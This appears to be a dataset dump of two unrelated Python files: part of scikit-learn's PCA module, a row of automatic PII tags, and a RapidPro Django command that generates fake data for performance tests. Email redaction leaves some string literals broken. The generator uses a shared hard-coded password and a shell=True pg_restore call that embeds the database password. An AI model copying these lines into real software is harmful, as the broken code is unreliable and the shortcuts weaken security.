(the relative variance scales of the components) but can sometime
improve the predictive accuracy of the downstream estimators by
making there data respect some hard-wired assumptions.
Attributes
----------
`components_` : array, [n_components, n_features]
Components with maximum variance.
`explained_variance_ratio_` : array, [n_components]
Percentage of variance explained by each of the selected components. \
k is not set then all components are stored and the sum of explained \
variances is equal to 1.0
`n_components_` : int
The estimated number of components. Relevant when n_components is set
to 'mle' or a number between 0 and 1 to select using explained
variance.
Notes
-----
For n_components='mle', this class uses the method of `Thomas P. Minka:
Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`
Due to implementation subtleties of the Singular Value Decomposition (SVD),
which is used in this implementation, running fit twice on the same matrix
can lead to principal components with signs flipped (change in direction).
For this reason, it is important to always use the same estimator object to
transform data in a consistent fashion.
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import PCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> pca = PCA(n_components=2)
>>> pca.fit(X)
PCA(copy=True, n_components=2, whiten=False)
>>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.99244... 0.00755...]
See also
--------
ProbabilisticPCA
RandomizedPCA
KernelPCA
SparsePCA
TruncatedSVD
"""
def __init__(self, n_components=None, copy=True, whiten=False):
self.n_components = n_components
self.copy = copy
self.whiten = whiten
def fit(self, X, y=None):
"""Fit the model with X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
self._fit(X)
return self
def fit_transform(self, X, y=None):
"""Fit the model with X and apply the dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
U, S, V = self._fit(X)
U = U[:, :self.n_components_]
if self.whiten:
# X_new = X * V / S * sqrt(n_samples) = U * sqrt(n_samples)
U *= sqrt(X.shape[0])
else:
# X_new = X * V = U * S * V^T * V = U * S
U *= S[:self.n_components_]
return U
def _fit(self, X):
""" Fit the model on X
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
Returns
-------
U, s, V : ndarrays
The SVD of the input data, copied and centered when
requested.
"""
X = array2d(X)
n_samples, n_features = X.shape
X = as_float_array(X, copy=self.copy)
# Center data
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
U, S, V = linalg.svd(X, full_matrices=False)
self.explained_variance_ = (S ** 2) / n_samples
self.explained_variance_ratio_ = (self.explained_variance_ /
self.explained_variance_.sum())
if self.whiten:
self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)
else:
self.components_ = V
n_components = self.n_components
if n_components is None:
n_components = n_features
elif n_components == 'mle':
if n_samples < n_features:
raise ValueError("n_components='mle' is only supported "
"if n_samples >= n_features")
n_components = _infer_dimension_(self.explained_variance_,
n_samples, n_features)
if 0 < n_components < 1.0:
# number of components for which the cumulated explained variance
# percentage is superior to the desired threshold
ratio_cumsum = self.explained_variance_ratio_.cumsum()
n_components = np.sum(ratio_cumsum < n_components) + 1
self.components_ = self.components_[:n_components, :]
self.explained_variance_ = \
self.explained_variance_[:n_components]
self.explained_variance_ratio_ = \
self.explained_variance_ratio_[:n_components]
self.n_components_ = n_components
return (U, S, V)
def transform(self, X):
"""Apply the dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
X = array2d(X)
if self.mean_ is not None:
X = X - self.mean_
X_transformed = fast_dot(X, self.components_.T)
return X_transformed
def inverse_transform(self, X):
"""Transform data back to its original space, i.e.,
return an input X_original whose transform would be X
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples is the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform does not compute the
exact inverse operation as transform.
"""
return fast_dot(X, self.components_) + self.mean_
class ProbabilisticPCA(PCA):
"""Additional layer on top of PCA that adds a probabilistic evaluation"""
__doc__ += PCA.__doc__
def fit(self, X, y=None, homoscedastic=True):
"""Additionally to PCA.fit, learns a covariance model
Parameters
----------
X : array of shape(n_samples, n_features)
The data to fit
homoscedastic : bool, optional,
If True, average variance across remaining dimensions
"""
PCA.fit(self, X)
n_samples, n_features = X.shape
self._dim = n_features
Xr = X - self.mean_
Xr -= np.dot(np.dot(Xr, self.components_.T), self.components_)
n_components = self.n_components
if n_components is None:
n_components = n_features
# Make the low rank part of the estimated covariance
self.covariance_ = np.dot(self.components_[:n_components].T *
self.explained_variance_[:n_components],
self.components_[:n_components])
if n_features == n_components:
delta = 0.
elif homoscedastic:
delta = (Xr ** 2).sum() / (n_samples * n_features)
else:
delta = (Xr ** 2).mean(axis=0) / (n_features - n_components)
# Add delta to the diagonal without extra allocation
self.covariance_.flat[::n_features + 1] += delta
return self
def score(self, X, y=None):
"""Return a score associated to new data
Parameters
----------
X: array of shape(n_samples, n_features)
The data to test
Returns
-------
ll: array of shape (n_samples),
log-likelihood of each row of X under the current model
"""
Xr = X - self.mean_
n_features = X.shape[1]
log_like = np.zeros(X.shape[0])
self.precision_ = linalg.inv(self.covariance_)
log_like = -.5 * (Xr * (np.dot(Xr, self.precision_))).sum(axis=1)
log_like -= .5 * (fast_logdet(self.covariance_)
+ n_features * log(2. * np.pi))
return log_like
class RandomizedPCA(BaseEstimator, TransformerMixin):
"""Principal component analysis (PCA) using randomized SVD
Linear dimensionality reduction using approximated Singular Value
Decomposition of the data and keeping only the most significant
singular vectors to project the data to a lower dimensional space.
Parameters
----------
n_components : int, optional
Maximum number of components to keep. When not given or None, this
is set to n_features (the second dimension of the training data).
copy : bool
If False, data passed to fit are overwritten and running
fit(X).transform(X) will not yield the expected results,
use fit_transform(X) instead.
iterated_power : int, optional
Number of iterations for the power method. 3 by default.
whiten : bool, optional
When True (False by default) the `components_` vectors are divided
by the singular values to ensure uncorrelated outputs with unit
component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometime
improve the predictive accuracy of the downstream estimators by
making their data respect some hard-wired assumptions.
random_state : int or RandomState instance or None (default)
Pseudo Random Number generator seed control. If None, use the
numpy.random singleton.
Attributes
----------
`components_` : array, [n_components, n_features]
Components with maximum variance.
`explained_variance_ratio_` : array, [n_components]
Percentage of variance explained by each of the selected components. \
k is not set then all components are stored and the sum of explained \
variances is equal to 1.0
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import RandomizedPCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> pca = RandomizedPCA(n_components=2)
>>> pca.fit(X) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
RandomizedPCA(copy=True, iterated_power=3, n_components=2,
random_state=None, whiten=False)
>>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.99244... 0.00755...]
See also
--------
PCA
ProbabilisticPCA
TruncatedSVD
References
----------
.. [Halko2009] `Finding structure with randomness: Stochastic algorithms
for constructing approximate matrix decompositions Halko, et al., 2009
(arXiv:909)`
.. [MRT] `A randomized algorithm for the decomposition of matrices
Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert`
Notes
-----
This class supports sparse matrix input for backward compatibility, but
actually computes a truncated SVD instead of a PCA in that case (i.e. no
centering is performed). This support is deprecated; use the class
TruncatedSVD for sparse matrix support.
"""
def __init__(self, n_components=None, copy=True, iterated_power=3,
whiten=False, random_state=None):
self.n_components = n_components
self.copy = copy
self.iterated_power = iterated_power
self.whiten = whiten
self.mean_ = None
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model with X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
self._fit(X)
return self
def _fit(self, X):
"""Fit the model to the data X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
Returns
-------
X : ndarray, shape (n_samples, n_features)
The input data, copied, centered and whitened when requested.
"""
random_state = check_random_state(self.random_state)
if hasattr(X, 'todense'):
warnings.warn("Sparse matrix support is deprecated"
" and will be dropped in 0.16."
" Use TruncatedSVD instead.",
DeprecationWarning)
else:
# not a sparse matrix, ensure this is a 2D array
X = np.atleast_2d(as_float_array(X, copy=self.copy))
n_samples = X.shape[0]
if not hasattr(X, 'todense'):
# Center data
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
if self.n_components is None:
n_components = X.shape[1]
else:
n_components = self.n_components
U, S, V = randomized_svd(X, n_components,
n_iter=self.iterated_power,
random_state=random_state)
self.explained_variance_ = exp_var = (S ** 2) / n_samples
self.explained_variance_ratio_ = exp_var / exp_var.sum()
if self.whiten:
self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)
else:
self.components_ = V
return X
def transform(self, X, y=None):
"""Apply dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
# XXX remove scipy.sparse support here in 0.16
X = atleast2d_or_csr(X)
if self.mean_ is not None:
X = X - self.mean_
X = safe_sparse_dot(X, self.components_.T)
return X
def fit_transform(self, X, y=None):
"""Apply dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
X = self._fit(atleast2d_or_csr(X))
X = safe_sparse_dot(X, self.components_.T)
return X
def inverse_transform(self, X, y=None):
"""Transform data back to its original space.
Returns an array X_original whose transform would be X.
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples in the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform does not compute the
exact inverse operation of transform.
"""
# XXX remove scipy.sparse support here in 0.16
X_original = safe_sparse_dot(X, self.components_)
if self.mean_ is not None:
X_original = X_original + self.mean_
return X_original
| 20,495 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Alexandre Gramfort'], ['PERSON', 'Olivier Grisel'], ['LOCATION', 'n_samples'], ['PERSON', 'Thomas P. Minka'], ['LOCATION', 'log(2'], ['LOCATION', 'log(2'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['PERSON', 'n_components'], ['PERSON', 'Thomas P. Minka'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'log(2'], ['LOCATION', 'n_components'], ['DATE_TIME', '2009'], ['PERSON', 'Gunnar Martinsson'], ['PERSON', 'Vladimir Rokhlin'], ['PERSON', 'Mark Tygert'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'randomized_svd(X'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['IP_ADDRESS', '\n\n '], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '..ba'], ['URL', 'np.su'], ['URL', 'np.su'], ['URL', 'spectrum.co'], ['URL', 'll.ar'], ['URL', 'scipy.li'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'linalg.sv'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'np.su'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'PCA.fi'], ['URL', 'PCA.fi'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.pr'], ['URL', 'linalg.in'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.pr'], ['URL', 'self.co'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'self.it'], ['URL', 'self.me'], ['URL', 'np.at'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'self.it'], ['URL', 'var.su'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me']] |
86 | from __future__ import unicode_literals, division, print_function
import json
import math
import pytz
import random
import resource
import six
import sys
import time
import uuid
from collections import defaultdict
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.models import User
from django.core.management import BaseCommand, CommandError
from django.core.management.base import CommandParser
from django.db import connection, transaction
from django.utils import timezone
from django_redis import get_redis_connection
from subprocess import check_call, CalledProcessError
from temba.channels.models import Channel
from temba.channels.tasks import squash_channelcounts
from temba.contacts.models import Contact, ContactField, ContactGroup, ContactURN, ContactGroupCount, URN, TEL_SCHEME, TWITTER_SCHEME
from temba.flows.models import FlowStart, FlowRun
from temba.flows.tasks import squash_flowpathcounts, squash_flowruncounts, prune_recentmessages
from temba.locations.models import AdminBoundary
from temba.msgs.models import Label, Msg
from temba.msgs.tasks import squash_labelcounts
from temba.orgs.models import Org
from temba.orgs.tasks import squash_topupcredits
from temba.utils import chunk_list, ms_to_datetime, datetime_to_str, datetime_to_ms
from temba.values.models import Value
# maximum age in days of database content
CONTENT_AGE = 3 * 365
# every user will have this password including the superuser
USER_PASSWORD = "Qwerty123"
# database dump containing admin boundary records
LOCATIONS_DUMP = 'test-data/nigeria.bin'
# organization names are generated from these components
ORG_NAMES = (
("UNICEF", "WHO", "WFP", "UNESCO", "UNHCR", "UNITAR", "FAO", "UNEP", "UNAIDS", "UNDAF"),
("Nigeria", "Chile", "Indonesia", "Rwanda", "Mexico", "Zambia", "India", "Brazil", "Sudan", "Mozambique")
)
# the users, channels, groups, labels and fields to create for each organization
USERS = (
{'username': "admin%d", 'email': dummy@email.com", 'role': 'administrators'},
{'username': "editor%d", 'email': dummy@email.com", 'role': 'editors'},
{'username': "viewer%d", 'email': dummy@email.com", 'role': 'viewers'},
{'username': "surveyor%d", 'email': dummy@email.com", 'role': 'surveyors'},
)
CHANNELS = (
{'name': "Android", 'channel_type': Channel.TYPE_ANDROID, 'scheme': 'tel', 'address': "1234"},
{'name': "Nexmo", 'channel_type': Channel.TYPE_NEXMO, 'scheme': 'tel', 'address': "2345"},
{'name': "Twitter", 'channel_type': 'TT', 'scheme': 'twitter', 'address': "my_handle"},
)
FIELDS = (
{'key': 'gender', 'label': "Gender", 'value_type': Value.TYPE_TEXT},
{'key': 'age', 'label': "Age", 'value_type': Value.TYPE_DECIMAL},
{'key': 'joined', 'label': "Joined On", 'value_type': Value.TYPE_DATETIME},
{'key': 'ward', 'label': "Ward", 'value_type': Value.TYPE_WARD},
{'key': 'district', 'label': "District", 'value_type': Value.TYPE_DISTRICT},
{'key': 'state', 'label': "State", 'value_type': Value.TYPE_STATE},
)
GROUPS = (
{'name': "Reporters", 'query': None, 'member': 0.95}, # member is either a probability or callable
{'name': "Farmers", 'query': None, 'member': 0.5},
{'name': "Doctors", 'query': None, 'member': 0.4},
{'name': "Teachers", 'query': None, 'member': 0.3},
{'name': "Drivers", 'query': None, 'member': 0.2},
{'name': "Testers", 'query': None, 'member': 0.1},
{'name': "Empty", 'query': None, 'member': 0.0},
{'name': "Youth (Dynamic)", 'query': 'age <= 18', 'member': lambda c: c['age'] and c['age'] <= 18},
{'name': "Unregistered (Dynamic)", 'query': 'joined = ""', 'member': lambda c: not c['joined']},
{'name': "Districts (Dynamic)", 'query': 'district=Faskari or district=Zuru or district=Anka',
'member': lambda c: c['district'] and c['district'].name in ("Faskari", "Zuru", "Anka")},
)
LABELS = ("Reporting", "Testing", "Youth", "Farming", "Health", "Education", "Trade", "Driving", "Building", "Spam")
FLOWS = (
{'name': "Favorites", 'file': "favorites.json", 'templates': (
["blue", "mutzig", "bob"],
["orange", "green", "primus", "jeb"],
)},
{'name': "SMS Form", 'file': "sms_form.json", 'templates': (["22 F Seattle"], ["35 M MIAMI"])},
{'name': "Pick a Number", 'file': "pick_a_number.json", 'templates': (["1"], ["4"], ["5"], ["7"], ["8"])}
)
# contact names are generated from these components
CONTACT_NAMES = (
("", "Anne", "Bob", "Cathy", "Dave", "Evan", "Freda", "George", "Hallie", "Igor"),
("", "Jameson", "Kardashian", "Lopez", "Mooney", "Newman", "O'Shea", "Poots", "Quincy", "Roberts"),
)
CONTACT_LANGS = (None, "eng", "fre", "spa", "kin")
CONTACT_HAS_TEL_PROB = 0.9 # 9/10 contacts have a phone number
CONTACT_HAS_TWITTER_PROB = 0.1 # 1/10 contacts have a twitter handle
CONTACT_IS_STOPPED_PROB = 0.01 # 1/100 contacts are stopped
CONTACT_IS_BLOCKED_PROB = 0.01 # 1/100 contacts are blocked
CONTACT_IS_DELETED_PROB = 0.005 # 1/200 contacts are deleted
CONTACT_HAS_FIELD_PROB = 0.8 # 8/10 fields set for each contact
RUN_RESPONSE_PROB = 0.1 # 1/10 runs will be responded to
INBOX_MESSAGES = (("What is", "I like", "No"), ("beer", "tea", "coffee"), ("thank you", "please", "today"))
class Command(BaseCommand):
COMMAND_GENERATE = 'generate'
COMMAND_SIMULATE = 'simulate'
help = "Generates a database suitable for performance testing"
def add_arguments(self, parser):
cmd = self
subparsers = parser.add_subparsers(dest='command', help='Command to perform',
parser_class=lambda **kw: CommandParser(cmd, **kw))
gen_parser = subparsers.add_parser('generate', help='Generates a clean testing database')
gen_parser.add_argument('--orgs', type=int, action='store', dest='num_orgs', default=100)
gen_parser.add_argument('--contacts', type=int, action='store', dest='num_contacts', default=1000000)
gen_parser.add_argument('--seed', type=int, action='store', dest='seed', default=None)
sim_parser = subparsers.add_parser('simulate', help='Simulates activity on an existing database')
sim_parser.add_argument('--runs', type=int, action='store', dest='num_runs', default=500)
def handle(self, command, *args, **kwargs):
start = time.time()
if command == self.COMMAND_GENERATE:
self.handle_generate(kwargs['num_orgs'], kwargs['num_contacts'], kwargs['seed'])
else:
self.handle_simulate(kwargs['num_runs'])
time_taken = time.time() - start
self._log("Completed in %d secs, peak memory usage: %d MiB\n" % (int(time_taken), int(self.peak_memory())))
def handle_generate(self, num_orgs, num_contacts, seed):
"""
Creates a clean database
"""
seed = self.configure_random(num_orgs, seed)
self._log("Generating random base database (seed=%d)...\n" % seed)
try:
has_data = Org.objects.exists()
except Exception: # pragma: no cover
raise CommandError("Run migrate command first to create database tables")
if has_data:
raise CommandError("Can't generate content in non-empty database.")
self.batch_size = 5000
# the timespan being modelled by this database
self.db_ends_on = timezone.now()
self.db_begins_on = self.db_ends_on - timedelta(days=CONTENT_AGE)
# this is a new database so clear out redis
self._log("Clearing out Redis cache... ")
r = get_redis_connection()
r.flushdb()
self._log(self.style.SUCCESS("OK") + '\n')
superuser = User.objects.create_superuser("root", dummy@email.com", USER_PASSWORD)
country, locations = self.load_locations(LOCATIONS_DUMP)
orgs = self.create_orgs(superuser, country, num_orgs)
self.create_users(orgs)
self.create_channels(orgs)
self.create_fields(orgs)
self.create_groups(orgs)
self.create_labels(orgs)
self.create_flows(orgs)
self.create_contacts(orgs, locations, num_contacts)
def handle_simulate(self, num_runs):
"""
Prepares to resume simulating flow activity on an existing database
"""
self._log("Resuming flow activity simulation on existing database...\n")
orgs = list(Org.objects.order_by('id'))
if not orgs:
raise CommandError("Can't simulate activity on an empty database")
self.configure_random(len(orgs))
# in real life Nexmo messages are throttled, but that's not necessary for this simulation
del Channel.CHANNEL_SETTINGS[Channel.TYPE_NEXMO]['max_tps']
inputs_by_flow_name = {f['name']: f['templates'] for f in FLOWS}
self._log("Preparing existing orgs... ")
for org in orgs:
flows = list(org.flows.order_by('id'))
for flow in flows:
flow.input_templates = inputs_by_flow_name[flow.name]
org.cache = {
'users': list(org.get_org_users().order_by('id')),
'channels': list(org.channels.order_by('id')),
'groups': list(ContactGroup.user_groups.filter(org=org).order_by('id')),
'flows': flows,
'contacts': list(org.org_contacts.values_list('id', flat=True)), # only ids to save memory
'activity': None
}
self._log(self.style.SUCCESS("OK") + '\n')
self.simulate_activity(orgs, num_runs)
def configure_random(self, num_orgs, seed=None):
if not seed:
seed = random.randrange(0, 65536)
self.random = random.Random(seed)
# monkey patch uuid4 so it returns the same UUIDs for the same seed, see https://github.com/joke2k/faker/issues/484#issuecomment-287931101
from temba.utils import models
models.uuid4 = lambda: uuid.UUID(int=(self.random.getrandbits(128) | (1 << 63) | (1 << 78)) & (~(1 << 79) & ~(1 << 77) & ~(1 << 76) & ~(1 << 62)))
# We want a variety of large and small orgs so when allocating content like contacts and messages, we apply a
# bias toward the beginning orgs. if there are N orgs, then the amount of content the first org will be
# allocated is (1/N) ^ (1/bias). This sets the bias so that the first org will get ~50% of the content:
self.org_bias = math.log(1.0 / num_orgs, 0.5)
return seed
def load_locations(self, path):
"""
Loads admin boundary records from the given dump of that table
"""
self._log("Loading locations from %s... " % path)
# load dump into current db with pg_restore
db_config = settings.DATABASES['default']
try:
check_call('export PGPASSWORD=%s && pg_restore -U%s -w -d %s %s' %
(db_config['PASSWORD'], db_config['USER'], db_config['NAME'], path), shell=True)
except CalledProcessError: # pragma: no cover
raise CommandError("Error occurred whilst calling pg_restore to load locations dump")
# fetch as tuples of (WARD, DISTRICT, STATE)
wards = AdminBoundary.objects.filter(level=3).prefetch_related('parent', 'parent__parent')
locations = [(w, w.parent, w.parent.parent) for w in wards]
country = AdminBoundary.objects.filter(level=0).get()
self._log(self.style.SUCCESS("OK") + '\n')
return country, locations
def create_orgs(self, superuser, country, num_total):
"""
Creates and initializes the orgs
"""
self._log("Creating %d orgs... " % num_total)
org_names = ['%s %s' % (o1, o2) for o2 in ORG_NAMES[1] for o1 in ORG_NAMES[0]]
self.random.shuffle(org_names)
orgs = []
for o in range(num_total):
orgs.append(Org(name=org_names[o % len(org_names)], timezone=self.random.choice(pytz.all_timezones),
brand='rapidpro.io', country=country,
created_on=self.db_begins_on, created_by=superuser, modified_by=superuser))
Org.objects.bulk_create(orgs)
orgs = list(Org.objects.order_by('id'))
self._log(self.style.SUCCESS("OK") + "\nInitializing orgs... ")
for o, org in enumerate(orgs):
org.initialize(topup_size=max((1000 - o), 1) * 1000)
# we'll cache some metadata on each org as it's created to save re-fetching things
org.cache = {
'users': [],
'fields': {},
'groups': [],
'system_groups': {g.group_type: g for g in ContactGroup.system_groups.filter(org=org)},
}
self._log(self.style.SUCCESS("OK") + '\n')
return orgs
def create_users(self, orgs):
"""
Creates a user of each type for each org
"""
self._log("Creating %d users... " % (len(orgs) * len(USERS)))
# create users for each org
for org in orgs:
for u in USERS:
user = User.objects.create_user(u['username'] % org.id, u['email'] % org.id, USER_PASSWORD)
getattr(org, u['role']).add(user)
user.set_org(org)
org.cache['users'].append(user)
self._log(self.style.SUCCESS("OK") + '\n')
def create_channels(self, orgs):
"""
Creates the channels for each org
"""
self._log("Creating %d channels... " % (len(orgs) * len(CHANNELS)))
for org in orgs:
user = org.cache['users'][0]
for c in CHANNELS:
Channel.objects.create(org=org, name=c['name'], channel_type=c['channel_type'],
address=c['address'], schemes=[c['scheme']],
created_by=user, modified_by=user)
self._log(self.style.SUCCESS("OK") + '\n')
def create_fields(self, orgs):
"""
Creates the contact fields for each org
"""
self._log("Creating %d fields... " % (len(orgs) * len(FIELDS)))
for org in orgs:
user = org.cache['users'][0]
for f in FIELDS:
field = ContactField.objects.create(org=org, key=f['key'], label=f['label'],
value_type=f['value_type'], show_in_table=True,
created_by=user, modified_by=user)
org.cache['fields'][f['key']] = field
self._log(self.style.SUCCESS("OK") + '\n')
def create_groups(self, orgs):
"""
Creates the contact groups for each org
"""
self._log("Creating %d groups... " % (len(orgs) * len(GROUPS)))
for org in orgs:
user = org.cache['users'][0]
for g in GROUPS:
if g['query']:
group = ContactGroup.create_dynamic(org, user, g['name'], g['query'])
else:
group = ContactGroup.user_groups.create(org=org, name=g['name'], created_by=user, modified_by=user)
group.member = g['member']
group.count = 0
org.cache['groups'].append(group)
self._log(self.style.SUCCESS("OK") + '\n')
def create_labels(self, orgs):
"""
Creates the message labels for each org
"""
self._log("Creating %d labels... " % (len(orgs) * len(LABELS)))
for org in orgs:
user = org.cache['users'][0]
for name in LABELS:
Label.label_objects.create(org=org, name=name, created_by=user, modified_by=user)
self._log(self.style.SUCCESS("OK") + '\n')
def create_flows(self, orgs):
"""
Creates the flows for each org
"""
self._log("Creating %d flows... " % (len(orgs) * len(FLOWS)))
for org in orgs:
user = org.cache['users'][0]
for f in FLOWS:
with open('media/test_flows/' + f['file'], 'r') as flow_file:
org.import_app(json.load(flow_file), user)
self._log(self.style.SUCCESS("OK") + '\n')
def create_contacts(self, orgs, locations, num_contacts):
"""
Creates test and regular contacts for this database. Returns tuples of org, contact id and the preferred urn
id to avoid trying to hold all contact and URN objects in memory.
"""
group_counts = defaultdict(int)
self._log("Creating %d test contacts..." % (len(orgs) * len(USERS)))
for org in orgs:
test_contacts = []
for user in org.cache['users']:
test_contacts.append(Contact.get_test_contact(user))
org.cache['test_contacts'] = test_contacts
self._log(self.style.SUCCESS("OK") + '\n')
self._log("Creating %d regular contacts...\n" % num_contacts)
# disable table triggers to speed up insertion and in the case of contact group m2m, avoid having an unsquashed
# count row for every contact
with DisableTriggersOn(Contact, ContactURN, Value, ContactGroup.contacts.through):
names = [('%s %s' % (c1, c2)).strip() for c2 in CONTACT_NAMES[1] for c1 in CONTACT_NAMES[0]]
names = [n if n else None for n in names]
batch_num = 1
for index_batch in chunk_list(six.moves.xrange(num_contacts), self.batch_size):
batch = []
# generate flat representations and contact objects for this batch
for c_index in index_batch: # pragma: no cover
org = self.random_org(orgs)
name = self.random_choice(names)
location = self.random_choice(locations) if self.probability(CONTACT_HAS_FIELD_PROB) else None
created_on = self.timeline_date(c_index / num_contacts)
c = {
'org': org,
'user': org.cache['users'][0],
'name': name,
'groups': [],
'tel': '+2507%08d' % c_index if self.probability(CONTACT_HAS_TEL_PROB) else None,
'twitter': '%s%d' % (name.replace(' ', '_').lower() if name else 'tweep', c_index) if self.probability(CONTACT_HAS_TWITTER_PROB) else None,
'gender': self.random_choice(('M', 'F')) if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'age': self.random.randint(16, 80) if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'joined': self.random_date() if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'ward': location[0] if location else None,
'district': location[1] if location else None,
'state': location[2] if location else None,
'language': self.random_choice(CONTACT_LANGS),
'is_stopped': self.probability(CONTACT_IS_STOPPED_PROB),
'is_blocked': self.probability(CONTACT_IS_BLOCKED_PROB),
'is_active': self.probability(1 - CONTACT_IS_DELETED_PROB),
'created_on': created_on,
'modified_on': self.random_date(created_on, self.db_ends_on),
}
# work out which system groups this contact belongs to
if c['is_active']:
if not c['is_blocked'] and not c['is_stopped']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_ALL])
if c['is_blocked']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_BLOCKED])
if c['is_stopped']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_STOPPED])
# let each user group decide if it is taking this contact
for g in org.cache['groups']:
if g.member(c) if callable(g.member) else self.probability(g.member):
c['groups'].append(g)
# track changes to group counts
for g in c['groups']:
group_counts[g] += 1
batch.append(c)
self._create_contact_batch(batch)
self._log(" > Created batch %d of %d\n" % (batch_num, max(num_contacts // self.batch_size, 1)))
